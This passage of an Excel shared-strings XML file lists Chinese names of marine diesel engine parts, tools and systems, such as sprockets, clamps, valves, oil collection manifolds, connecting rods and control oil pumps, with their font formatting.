        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链拆卸工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链传动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴链轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>槽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>槽钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>槽板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压空冷器壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器箱体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>量规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主起动阀检查管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>花钢板（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>5MM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管夹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝绳夹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹紧块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹紧螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卡环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两半式卡环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧定螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加紧套筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卡爪</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管卡爪接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹卡爪接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三通球阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函清洗</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洗说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洗管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洁工具</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">20MM </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹组件</t>
    </r>
  </si>
  <si>
    <r>
      <t>20MM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹组件</t>
    </r>
  </si>
  <si>
    <r>
      <t>30MM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>封闭盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>关紧栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>闷头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截止阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>围栏</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涂层说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通旋塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>线圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞下部污油收集总管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两段式套圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸缘螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套夹环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞卡环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函卡环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器冷凝水收集总管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀泄漏油收集总管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函污油收集总管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座泄放油收集总管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸冷却水总管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油水收集总管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器主污水排水管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两段式夹头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架门</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架电器件焊接图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组合扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口梅花扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口一梅花扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸压力监测</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>膨胀节</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机上零件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机上控制仪表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸压缩空间</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩弹簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统设计指导</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷凝水泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥式单向阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动活塞导环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥体杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椎管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥环</t>
    </r>
  </si>
  <si>
    <r>
      <t>2/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形插座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥角阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直角截止阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带插头的连接电缆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰连接件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆安装图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴连接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电气元件接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接半</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连通水腔</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信号设备接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>行程开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机控制设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气气源</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气气源布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气气源进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线箱（灯）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线箱（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>E20</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线箱（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>E25</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机旁操纵台控制箱支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制电缆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制型线</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制灯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制油泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>共轨单元控制油泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制油泵启动器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制油供给</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
